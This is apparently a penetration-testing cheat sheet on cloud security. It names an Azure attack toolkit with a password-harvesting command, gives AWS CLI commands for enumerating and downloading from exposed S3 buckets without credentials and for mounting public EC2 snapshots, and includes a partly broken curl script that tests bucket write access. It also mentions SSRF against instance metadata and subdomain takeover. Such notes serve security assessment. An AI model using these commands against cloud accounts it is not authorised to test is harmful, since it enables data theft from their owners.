Cloud Providers Security


Microsoft Azure

MicroBurst: A PowerShell Toolkit for Attacking Azure

PS>Import-Module .\MicroBurst.psm1
PS>Get-Help Get-AzurePasswords

Amazon AWS

AWS S3 Bucket/Object Finder

Check buckets policies

$for bucket in `aws s3 ls|awk '{print $3}'`; do echo "Bucket: $bucket"; aws s3api get-bucket-acl --bucket $bucket --query Grants[?Grantee.Type==\'Group\'].[Grantee.URI,Permission] --output text;aws s3api get-bucket-policy --bucket $bucket --output text 2>/dev/null; done

  • Check S3 buckets:
$aws s3 ls s3://mybucket --recursive --human-readable --summarize

Check without credentials:

$aws s3 ls s3://$BUCKET/ --no-sign-request --region us-west-2

  • Download a file:
$aws --profile $PROFILE s3 cp s3://$BUCKET/$FILE .

  • Check policies:
$aws s3api get-object --bucket $BUCKET --key $FILE $FILE
$aws s3api get-object-acl --bucket $BUCKET --key $FILE
$aws s3api put-object --bucket $BUCKET --key $FILE --body $FILE

CHECK BUCKET_WRITE without writing:

# use this by: ./ test-bucket/write.txt 
AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)"
AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)"
date=$(date +"%a, %d %b %Y %T %z")

# we create a checksum of the word "yepp", but will upload a file with the content "nope".
content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64)

signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64)
echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}"
result=$(curl -s --insecure -X PUT --data "nope" \
-H "Host: ${AWS_S3_BUCKET}" \
-H "Date: $date" \
-H "Content-Type: ${content_type}" \
-H "Content-MD5: ${content_md5}" \
-H "$acl" \
-H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" \

if [ "$(echo ${result} | grep 'The Content-MD5 you specified did not match what we received')" != "" ]; then
  exit 0
echo "$result"
exit 1

Open EC2 Snapshots

$aws --profile $PROFILE ec2 describe-snapshots


$aws --profile $PROFILE sts get-caller-identity
$aws --profile $PROFILE ec2 describe-snapshots --owner-id $ID

To mount the snapshot:

$aws --profile $PROFILE ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id $SID

Abusing instance metadata in a SSRF or internal attack

Internally access


AWS Subdomain Takeover

  • Howto test it:

Use massdns and look for SERVFAIL or REFUSED subdomains.

Re-using AWS Elastic IPs

$aws ec2 associate-address --instance-id $ID --public-ip $IP

  • Howto test it:

List all DNS type A entries of a domain and check if all IPs are allocated.

Internal IPs in public domains

Must not be allowed:

Check IAM and policies

$aws --profile $PROFILE iam get-user

$aws --profile $PROFILE iam list-attached-user-policies --user-name $USERNAME